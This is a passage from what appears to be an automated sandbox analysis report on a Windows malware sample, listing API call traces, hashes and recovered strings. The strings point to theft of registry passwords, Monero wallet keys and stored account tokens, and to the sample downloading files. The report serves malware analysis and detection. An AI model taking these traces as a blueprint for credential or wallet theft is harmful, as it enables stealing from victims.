                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                  • String ID: :
                  • API String ID: 2677904052-3653984579
                  • Opcode ID: 9d06f518a3aa8eb6a52e99f8a309c9a8f58a208684cb15384318c2ca4399ff22
                  • Instruction ID: 4c558586d004c0a19dad1bec753adb7ec8c8d63cc38201ee20509fe9a60ecd63
                  • Opcode Fuzzy Hash: 9d06f518a3aa8eb6a52e99f8a309c9a8f58a208684cb15384318c2ca4399ff22
                  • Instruction Fuzzy Hash: 83314E71D20149DFCB04EBB4DC96EFE7778BB46301B144528F102AB292DE34A966CF55
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00D5F6E0,00000000,?,002C0E2C,00000000,?,00000000), ref: 002B8130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B8137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 002B8158
                  • __aulldiv.LIBCMT ref: 002B8172
                  • __aulldiv.LIBCMT ref: 002B8180
                  • wsprintfA.USER32 ref: 002B81AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 5a61e57a511f0e5738b4a5e17e01f4daf3ce510cbf2a08ec99d9c39a68690c0e
                  • Instruction ID: f8f30fd8181aba52dee8170838f74dc1ef7e7d80c87b4c241efa9e94801194a1
                  • Opcode Fuzzy Hash: 5a61e57a511f0e5738b4a5e17e01f4daf3ce510cbf2a08ec99d9c39a68690c0e
                  • Instruction Fuzzy Hash: F12151B1D54248ABDB00DFD4CC49FEEB778FB44740F104519F605BB280D77869118BA5
                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002A4839
                    • Part of subcall function 002A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002A4849
                  • InternetOpenA.WININET(002C0DF7,00000001,00000000,00000000,00000000), ref: 002A610F
                  • StrCmpCA.SHLWAPI(?,00D5FCE0), ref: 002A6147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 002A618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002A61B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 002A61DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002A620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 002A6249
                  • InternetCloseHandle.WININET(?), ref: 002A6253
                  • InternetCloseHandle.WININET(00000000), ref: 002A6260
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: 70fe8ccf4643b93ecfe630240a4324240bf2a2f9175af7920c65e7377d9bf6a8
                  • Instruction ID: fa85840127e8a47cd06cf06b35225cc67a0abb3825912cd8c060a54b0db1d501
                  • Opcode Fuzzy Hash: 70fe8ccf4643b93ecfe630240a4324240bf2a2f9175af7920c65e7377d9bf6a8
                  • Instruction Fuzzy Hash: 5A5194B1910218ABDF20DF60DC49BEE7778FB44701F1481A8B605AB1C1DF74AA95CF95
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002A733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002A73B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 002A740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 002A7452
                  • HeapFree.KERNEL32(00000000), ref: 002A7459
                  • task.LIBCPMTD ref: 002A7555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuetask
                  • String ID: Password
                  • API String ID: 775622407-3434357891
                  • Opcode ID: 3503e56350c3979d9f8b9f1ebea1c4074ef3e4ef4ae5f873c053c8b43821c82e
                  • Instruction ID: 1f099a45fcdaf8946bee62946e6f3278731367e18e864f469b14c4a7853fa30b
                  • Opcode Fuzzy Hash: 3503e56350c3979d9f8b9f1ebea1c4074ef3e4ef4ae5f873c053c8b43821c82e
                  • Instruction Fuzzy Hash: 09614CB5D201589BDB24DF50CC45BDAB7B8BF49300F0081E9E649A6141EFB06BD9CFA5
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                  • lstrlen.KERNEL32(00000000), ref: 002ABC9F
                    • Part of subcall function 002B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002B8E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 002ABCCD
                  • lstrlen.KERNEL32(00000000), ref: 002ABDA5
                  • lstrlen.KERNEL32(00000000), ref: 002ABDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: fc20c681ce9fa05fddc504cd21943fa7fbb0948a8ee3bbecb3f4543e7511ed73
                  • Instruction ID: 23032a3c35bb65a38b5ed7035896d35f9069b881d5d0eca4f9a7212de3da22d5
                  • Opcode Fuzzy Hash: fc20c681ce9fa05fddc504cd21943fa7fbb0948a8ee3bbecb3f4543e7511ed73
                  • Instruction Fuzzy Hash: F1B12F71920108ABDB14FBA0DD96EEE7338AF55340F404568F506B7492EF346A69CFA2
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: 751f92b554115f3ff36f1d4d6151ca079cacb8011425c51f4c9a3e548f669383
                  • Instruction ID: 6f0ef3280c3410b153798692b7ae98fe54bd92d809d526d1b6fa54f2ec75ce5b
                  • Opcode Fuzzy Hash: 751f92b554115f3ff36f1d4d6151ca079cacb8011425c51f4c9a3e548f669383
                  • Instruction Fuzzy Hash: 75F08934904289EFD344DFE0E94D76CBB70FB04703F0401A8F6058A2D1DA749B61DB9A
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002A4FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002A4FD1
                  • InternetOpenA.WININET(002C0DDF,00000000,00000000,00000000,00000000), ref: 002A4FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 002A5011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 002A5041
                  • InternetCloseHandle.WININET(?), ref: 002A50B9
                  • InternetCloseHandle.WININET(?), ref: 002A50C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 67e51deff26dffc159b1432f7aabe1efbb59eef8a743f1d08b396ce47273d2b1
                  • Instruction ID: f6eae36b4310afc10691590f51c6f9fcd00803d9e93051b2922c756aeb4928a7
                  • Opcode Fuzzy Hash: 67e51deff26dffc159b1432f7aabe1efbb59eef8a743f1d08b396ce47273d2b1
                  • Instruction Fuzzy Hash: 3E31F8B4A10218ABDB20CF54DC85BDDB7B4FB48704F5081E9F709A7281DB706AD58F99
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 002B8426
                  • wsprintfA.USER32 ref: 002B8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 002B847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B8499
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                  • RegQueryValueExA.ADVAPI32(00000000,00D5F6C8,00000000,000F003F,?,00000400), ref: 002B84EC
                  • lstrlen.KERNEL32(?), ref: 002B8501
                  • RegQueryValueExA.ADVAPI32(00000000,00D5F770,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,002C0B34), ref: 002B8599
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B8608
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: 9b45ade37e63f36b40d00606954512bc606d6febedb4b6b832e1463f12af02cc
                  • Instruction ID: a6349181ad843d11778b2ba2c6a303e48e9986aa0bb604092f557bd58a8593ab
                  • Opcode Fuzzy Hash: 9b45ade37e63f36b40d00606954512bc606d6febedb4b6b832e1463f12af02cc
                  • Instruction Fuzzy Hash: BA21E971910228ABDB24DF54DC85FE9B7B8FB48704F00C5E8E609A6141DF71AA95CFE4
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B76A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B76AB
                  • RegOpenKeyExA.ADVAPI32(80000002,00D4BBF8,00000000,00020119,00000000), ref: 002B76DD
                  • RegQueryValueExA.ADVAPI32(00000000,00D5F5F0,00000000,00000000,?,000000FF), ref: 002B76FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B7708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: eb1fa53144b2e736c3a2817190ec2514818f0d26e4f26eabf72774954dae9a1f
                  • Instruction ID: 2629baa54a04e664e5a2d2cd12d6fd8e4d63aa513d0bffe12b09db69fe2b5977
                  • Opcode Fuzzy Hash: eb1fa53144b2e736c3a2817190ec2514818f0d26e4f26eabf72774954dae9a1f
                  • Instruction Fuzzy Hash: 740162B5A14208BBD700EBE4DC89FADB7BCEB48701F104164FA05DB292DA70A9249B55
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B7734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B773B
                  • RegOpenKeyExA.ADVAPI32(80000002,00D4BBF8,00000000,00020119,002B76B9), ref: 002B775B
                  • RegQueryValueExA.ADVAPI32(002B76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 002B777A
                  • RegCloseKey.ADVAPI32(002B76B9), ref: 002B7784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 900b7275e0d170b225efaab0ed1246b6760d020bea58f1d11194cccca3a931a6
                  • Instruction ID: 6283fa828023873884759fbf05c495af9ece3d4a80ac702137426fbd7d9c166e
                  • Opcode Fuzzy Hash: 900b7275e0d170b225efaab0ed1246b6760d020bea58f1d11194cccca3a931a6
                  • Instruction Fuzzy Hash: 070167B5A40308BBDB10DFE0DC89FAEB7B8FB44700F004158FA05AB281DA70A510CF55
                  APIs
                  • CreateFileA.KERNEL32(:+,80000000,00000003,00000000,00000003,00000080,00000000,?,002B3AEE,?), ref: 002B92FC
                  • GetFileSizeEx.KERNEL32(000000FF,:+), ref: 002B9319
                  • CloseHandle.KERNEL32(000000FF), ref: 002B9327
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID: :+$:+
                  • API String ID: 1378416451-4145033400
                  • Opcode ID: da1d172b639e54c809b96bbfcc453cf0569161341183613950ccadbf1132b57f
                  • Instruction ID: 7a5df88872d82bed0e38b1ea4ff2524781694870feea0ea2874f9caf25df2ac8
                  • Opcode Fuzzy Hash: da1d172b639e54c809b96bbfcc453cf0569161341183613950ccadbf1132b57f
